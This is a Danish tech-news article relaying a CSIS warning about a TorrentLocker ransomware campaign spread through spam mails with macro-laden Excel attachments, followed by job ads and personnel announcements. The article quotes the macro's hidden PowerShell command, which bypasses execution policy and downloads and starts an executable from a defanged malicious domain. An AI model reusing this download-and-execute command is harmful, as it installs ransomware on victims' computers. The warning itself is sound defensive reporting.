Danmark ramt af nyt ransomware-angreb: Du skal ikke åbne denne mail

Danmark rammes i disse dage af en bølge af ondsindet ransomware, der kan låse din computers filer.

Artikel top billede

Danmark er mål for endnu en spamkampagne fra it-kriminelle, der bærer en ransomware i Torrentlocker-familien.

Det skriver sikkerhedsfirmaet CSIS i en sikkerhedsadvarsel.

Den ondsindede email ligner de fleste andre spam-emails for tiden med en tilsyneladende personlig besked på dansk og et tilknyttet Excel-dokument.

Hvis denne fil åbnes af en uforsigtig modtager og får en tilknyttet makrokode aktiveret ved at slå Excels beskyttelsestilstand fra, vil brugeren ende med en krypteret computer.

Du kan se et eksempel på mailen i toppen af artiklen. 

Aktiveres automatisk 

Makrokoden henter automatisk selve ransomware-programmet ned fra et ondsindet domæne, der via Windows' powershell-framework henter ransomware i Torrentlocker-klassen ned og afvikler programmet.

Det vil resultere i en låst computer og formodentligt et krav om en løsesum.

Funktionen ses udført via følgende powershell i en sikret form fra CSIS:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.exE -ExeCuTiONPoliCY BYpaSS -nOProfilE -WIndoWsTyle hiddeN (nEw-objeCT SySTEM.NET.WeBcLIeNt).dOWnLoadFIle('http://ltmp.applepice[.]pl/file/set.rte','C:\Users\[%brugerkonto%]\AppData\Roaming.eXE');staRT-PrOcESS 'C:\Users\[%brugerkonto%]\AppData\Roaming.EXe'

Alle bør derfor være opmærksomme, hvis de modtager en mail med et enkeltstående xls-dokument, der ikke giver mening, og særligt hvis det kommer fra en ukendt email-adresse.

Angrebet minder i høj grad som et lignende angreb fra sidste uge, hvor ransomwaren blev aktiveret af en vedhæftet zip-fil.

Det fik i sidste uge CSIS til at højne sin trusselvurdering til 4 ud af 5.  

Læs også: Sikkerhedsfirma advarer: Målrettet ransomware-kampagne skyller ind over Danmark

Læses lige nu

    Annonceindlæg fra Conscia

    Internettets smutveje er smarte – men hvad gør I for at sikre dem?

    Det er fristende at spare tid med lækre internetapps og GenAI. Men pas på. Uautoriseret brug risikerer at underminere hele forretningsgevinsten.

    TD SYNNEX Denmark ApS

    BDM Cisco Security

    Københavnsområdet

    IT-Forsyningen I/S

    Leder af serverteam

    Københavnsområdet

    Netcompany A/S

    Network Engineer

    Nordjylland

    Navnenyt fra it-Danmark

    Netip A/S har pr. 1. november 2025 ansat Kristian Kveiborg Yde som BI-konsulent ved netIP's kontor i Thisted. Han er uddannet med en Cand.merc. i økonomistyring. Nyt job
    Enterprise Rent-A-Car har pr. 1. september 2025 ansat Christian Kamper Garst som Senior Key Account Manager. Han skal især beskæftige sig med at vinde markedsandele i hele Norden som led i en storstilet turnaround-strategi. Han kommer fra en stilling som Salgsdirektør hos Brøchner Hotels. Nyt job

    Christian Kamper Garst

    Enterprise Rent-A-Car

    Netip A/S har pr. 15. september 2025 ansat Peter Holst Ring Madsen som Systemkonsulent ved netIP's kontor i Holstebro. Han kommer fra en stilling som Team Lead hos Thise Mejeri. Nyt job
    VisionBird har pr. 1. november 2025 ansat Kelly Lyng Ludvigsen, 38 år,  som Seniorrådgiver. Hun skal især beskæftige sig med Rådgivning og undervisning i Contract Management. Hun kommer fra en stilling som Contract Manager hos Novo Nordisk. Hun er uddannet Cand. jur. og BS fra CBS. Hun har tidligere beskæftiget sig med Contract Management i flere roller i både det private, offentlige og som konsulent. Nyt job

    Kelly Lyng Luvigsen

    VisionBird